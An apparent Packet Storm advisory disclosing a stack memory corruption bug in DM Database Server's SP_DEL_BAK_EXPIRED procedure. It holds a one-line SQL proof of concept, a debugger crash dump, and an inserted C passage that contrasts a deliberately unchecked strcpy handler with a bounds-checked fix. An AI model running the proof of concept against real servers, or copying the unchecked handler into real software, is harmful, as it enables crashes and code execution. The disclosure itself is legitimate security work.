DM Database Server Memory Corruption

2010-06-02T00:00:00
ID PACKETSTORM:90138
Type packetstorm
Reporter Shennan Wang
Modified 2010-06-02T00:00:00

Description

                                        
DM Database Server Memory Corruption Vulnerability  
  
  
Vulnerable: All Version  
Vendor: www.dameng.com  
Discovered by: Shennan Wang (HuaweiSymantec SRT)  
  
  
Details:  
=========  
A vulnerability in all versions of DM Database Server allows an attacker to execute arbitrary code or cause a DoS (Denial of Service). Authentication is required to exploit this vulnerability.  
  
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.  
  
  
POC:   
=========  
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');  
  
  
  
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)  
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c  
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246  
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -   
wdm_dll+0xd1753:  
100d1753 f2ae repne scas byte ptr es:[edi]  
0:009> da ebp  
074ed1fc "AAAAAAAAAAAAAAAAAAAA"  
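The dump above (`ebp` pointing into the "AAAA..." argument, an inlined `strlen` running `repne scas` off a bad pointer) is the signature of a procedure argument copied into a fixed stack buffer without a length check. The following is an added illustration in C, hypothetical and not DM Database Server's code: the unchecked handler pattern beside a hardened version that bounds the scan and rejects over-long or NULL arguments before touching the buffer. `ARG_MAX`, the function names and the sample inputs are assumptions.

```c
/* Added example (hypothetical, not DM Database Server code): a stored-procedure
 * handler stages two string arguments (backup dir, expiry) in fixed stack
 * buffers. ARG_MAX and the function names are assumptions. */
#include <stdio.h>
#include <string.h>

#define ARG_MAX 16  /* assumed size of the handler's per-argument buffer */

/* Vulnerable pattern: unbounded copy. A 20-byte first argument runs past
 * arg1[] into the saved frame, the kind of corruption the crash dump shows
 * (ebp pointing into "AAAA..."). Kept only for contrast with the fix. */
int sp_del_bak_expired_unchecked(const char *bak_dir, const char *expiry)
{
    char arg1[ARG_MAX], arg2[ARG_MAX];
    strcpy(arg1, bak_dir);
    strcpy(arg2, expiry);
    return (int)(strlen(arg1) + strlen(arg2));
}

/* Length scan that stops at max bytes, so a missing terminator cannot become
 * the runaway "repne scas" in the dump (strnlen is POSIX, not C99). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened pattern: reject NULL and over-long arguments before any copy and
 * return an error the SQL layer can report instead of crashing the server. */
int sp_del_bak_expired_checked(const char *bak_dir, const char *expiry,
                               char *err, size_t err_len)
{
    char arg1[ARG_MAX], arg2[ARG_MAX];
    size_t n1, n2;
    if (bak_dir == NULL || expiry == NULL) {
        snprintf(err, err_len, "argument is NULL");
        return -1;
    }
    n1 = bounded_len(bak_dir, ARG_MAX);
    n2 = bounded_len(expiry, ARG_MAX);
    if (n1 >= ARG_MAX || n2 >= ARG_MAX) {
        snprintf(err, err_len, "argument longer than %d bytes", ARG_MAX - 1);
        return -1;
    }
    memcpy(arg1, bak_dir, n1 + 1);  /* n1 < ARG_MAX, terminator included */
    memcpy(arg2, expiry, n2 + 1);
    return (int)(n1 + n2);
}
```

With the 20-byte argument from the POC, the checked handler returns -1 and an error string rather than letting the copy reach the frame.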
  
  
  
Timeline:  
========  
2010.04.17 Report to vendor, no response.  
2010.05.31 Public  